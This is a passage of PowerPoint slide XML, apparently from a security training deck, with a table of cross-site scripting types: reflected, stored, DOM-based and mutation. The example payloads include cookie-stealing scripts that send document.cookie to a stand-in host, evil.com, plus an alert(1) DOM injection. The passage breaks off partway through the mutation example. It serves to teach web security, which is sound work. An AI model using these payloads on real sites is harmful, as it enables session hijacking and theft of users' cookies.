                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Top_10_2017-A3-Cross-Site_Scripting_(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11668280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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tableau 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1293168979"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="50454" y="915566"/>
          <a:ext cx="9850139" cy="3662680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1065162"/>
                <a:gridCol w="1584176"/>
                <a:gridCol w="7200801"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>XSS type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>example</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>from request parameter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Check this out: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>http://weak- site.com/search?</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>keyword=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>window.location</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>=‘http://evil.com?victimecookie=‘+document.cookie’&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>stored server-side</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>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i="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>LOL :p.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>window.location</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>='http://evil.com/?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>victimcookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>='+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>document.cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;/script&gt;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i="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>DOM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>based</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>introduced</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> by DOM modification</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>document.write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>("&lt;b&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Current</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> URL&lt;b&gt; : " + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>document.baseURI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;/script&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>http://www.example.com/test.html#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Mutation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>mutated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> by browser</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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effectLst/>
                        </a:rPr>
                        <a:t>&lt;!-- Attacker Input --&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
